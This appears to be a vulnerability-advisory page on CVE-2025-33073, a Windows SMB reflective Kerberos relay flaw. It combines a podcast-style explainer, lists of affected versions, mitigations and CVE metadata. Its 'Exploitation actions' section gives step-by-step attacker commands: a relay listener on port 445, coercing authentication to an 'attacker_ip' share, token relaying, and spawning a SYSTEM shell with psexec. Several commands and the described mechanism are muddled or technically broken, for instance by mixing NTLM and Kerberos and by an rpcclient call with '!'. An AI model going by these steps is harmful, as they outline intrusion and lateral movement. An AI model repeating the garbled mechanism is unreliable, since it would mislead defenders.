Windows SMB client: Improper access control in Windows SMB allowing privilege escalation via Reflective Kerberos Relay (CVE-2025-33073) #shorts

Summary

Hello and welcome to this podcast. Today we’re talking about CVE-2025-33073, a serious privilege-escalation vulnerability in Windows Server Message Block (SMB). Publicly disclosed by Microsoft on June 10, 2025, this issue could allow an authenticated attacker on the network to elevate to SYSTEM privileges via a reflective Kerberos relay attack. We’ll break down what it is, which products are affected, how it works, and how you can protect your systems.

Product details

CVE-2025-33073 affects a broad range of Windows operating systems and install options. All builds of Windows 10 (from Version 1507 up through 24H2), Windows 11 (22H2, 22H3, 23H2, 24H2), Windows Server 2008 SP2 (including Server Core), Server 2008 R2 SP1, Server 2012/R2, Server 2016, Server 2019 (and Server Core), Server 2022 (and 23H2 Core), and the new Windows Server 2025 (and its Core installation) are impacted if they have not been updated to the June 2025 security releases.

Vulnerability type summary

This vulnerability stems from improper access control (CWE-284) in the Windows SMB client implementation. An attacker with valid credentials can perform a reflective Kerberos relay using NTLM tokens over SMB, tricking the system into issuing higher-privileged tickets. This bypasses intended Kerberos safeguards and leads to SYSTEM-level execution.

Details of the vulnerability

Here’s how it works: 1. The attacker must first authenticate to an SMB share using normal credentials (for example, a low-privilege domain user). 2. The malicious SMB server then reflects the attacker’s NTLM authentication back at the client, triggering a Kerberos service ticket request for the attacker’s own identity. 3. Because of a flaw in how Windows caches and validates those tokens, the client unwittingly accepts a ticket with elevated privileges and presents it to itself. 4. The attacker uses this elevated ticket to run code as SYSTEM on the target machine. This attack can be launched from a compromised host inside the network or via a malicious SMB endpoint. It requires no user interaction beyond supplying valid credentials and exploits the way Windows handles reflected Kerberos authentication over SMB.

Conclusion

CVE-2025-33073 represents a powerful means for lateral movement and privilege escalation in Windows environments. To mitigate the risk: • Apply Microsoft’s June 2025 cumulative updates immediately on all affected systems. • Restrict SMB exposure to untrusted networks; enforce SMB signing and encryption where possible. • Monitor for unusual Kerberos ticket requests and NTLM relay behavior. • Follow the principle of least privilege and rotate service account credentials. That wraps up our deep-dive on CVE-2025-33073. Stay patched, stay vigilant, and thanks for listening.

Watch the full video on YouTube: CVE-2025-33073

Remediation and exploitation details

This chain involves the following actors

  • Attacker: Authorized domain user leveraging network access
  • Security Administrator: Responsible for system patching and hardening

This following systems are involved

  • Windows SMB Client (Network file and printer sharing): Initiates server message block authentication requests
  • Kerberos Relay Framework (Intercepts and relays authentication tokens): Exploitation tool for privilege escalation
  • Domain Controller (Issues Kerberos tickets): Central authentication authority

Attack entry point

  • Malicious SMB Server: Rogue server that captures Kerberos authentication from the client

Remediation actions

Security Administrator
Apply June 2025 security update
Windows SMB Client
Security Administrator
Enforce server message block packet signing
Windows SMB Client
Security Administrator
Restrict inbound server message block access via firewall rules
Windows SMB Client

Exploitation actions

Set up a listener for inbound SMB connections on port 445

Attacker
Deploy malicious server
Kerberos Relay Framework
Examples:
  • krelay --listen 0.0.0.0:445 --target cifs/host

Trick a user or machine to connect to the malicious server via a network share path

Attacker
Induce client authentication
Windows SMB Client
Examples:
  • net use \\attacker_ip\share /user:domain\\user password

Intercept the authentication request message from the client

Attacker
Capture Kerberos request token
Kerberos Relay Framework
Examples:
  • krelay --capture

Forward the captured request to a privileged service endpoint on the local network

Attacker
Relay token to target service
Domain Controller
Examples:
  • krelay --relay-to cifs/target_host

Use the relayed token to request a service ticket and bind to the service as the system account

Attacker
Authenticate as system
Windows SMB Client
Examples:
  • rpcclient -U ''%ticket%'' target_host -c '!'

Spawn a system privileged shell and move laterally across the network

Attacker
Execute code with system rights
Windows SMB Client
Examples:
  • psexec.py target_host -hashes : -no-pass cmd.exe

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-33073
Description
Improper access control in Windows SMB allows an authorized attacker to elevate privileges over a network.
Provider
microsoft
CWE / problem types
CWE-284: Improper Access Control
Affected Software Versions
Microsoft:Windows 10 Version 1809:[{'version': '10.0.17763.0', 'lessThan': '10.0.17763.7434', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2019:[{'version': '10.0.17763.0', 'lessThan': '10.0.17763.7434', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2019 (Server Core installation):[{'version': '10.0.17763.0', 'lessThan': '10.0.17763.7434', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2022:[{'version': '10.0.20348.0', 'lessThan': '10.0.20348.3807', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 10 Version 21H2:[{'version': '10.0.19044.0', 'lessThan': '10.0.19044.5965', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 11 version 22H2:[{'version': '10.0.22621.0', 'lessThan': '10.0.22621.5472', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 10 Version 22H2:[{'version': '10.0.19045.0', 'lessThan': '10.0.19045.5965', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2025 (Server Core installation):[{'version': '10.0.26100.0', 'lessThan': '10.0.26100.4349', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 11 version 22H3:[{'version': '10.0.22631.0', 'lessThan': '10.0.22631.5472', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 11 Version 23H2:[{'version': '10.0.22631.0', 'lessThan': '10.0.22631.5472', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2022, 23H2 Edition (Server Core installation):[{'version': '10.0.25398.0', 'lessThan': '10.0.25398.1665', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 11 Version 24H2:[{'version': '10.0.26100.0', 'lessThan': '10.0.26100.4349', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2025:[{'version': '10.0.26100.0', 'lessThan': '10.0.26100.4349', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 10 Version 1507:[{'version': '10.0.10240.0', 'lessThan': '10.0.10240.21034', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows 10 Version 1607:[{'version': '10.0.14393.0', 'lessThan': '10.0.14393.8148', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2016:[{'version': '10.0.14393.0', 'lessThan': '10.0.14393.8148', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2016 (Server Core installation):[{'version': '10.0.14393.0', 'lessThan': '10.0.14393.8148', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2008 Service Pack 2:[{'version': '6.0.6003.0', 'lessThan': '6.0.6003.23351', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2008 Service Pack 2 (Server Core installation):[{'version': '6.0.6003.0', 'lessThan': '6.0.6003.23351', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2008 Service Pack 2:[{'version': '6.0.6003.0', 'lessThan': '6.0.6003.23351', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2008 R2 Service Pack 1:[{'version': '6.1.7601.0', 'lessThan': '6.1.7601.27769', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2008 R2 Service Pack 1 (Server Core installation):[{'version': '6.1.7601.0', 'lessThan': '6.1.7601.27769', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2012:[{'version': '6.2.9200.0', 'lessThan': '6.2.9200.25522', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2012 (Server Core installation):[{'version': '6.2.9200.0', 'lessThan': '6.2.9200.25522', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2012 R2:[{'version': '6.3.9600.0', 'lessThan': '6.3.9600.22620', 'versionType': 'custom', 'status': 'affected'}],Microsoft:Windows Server 2012 R2 (Server Core installation):[{'version': '6.3.9600.0', 'lessThan': '6.3.9600.22620', 'versionType': 'custom', 'status': 'affected'}]
Date Published
2025-06-10T17:02:35.874Z
Last Updated
2025-06-13T01:10:43.119Z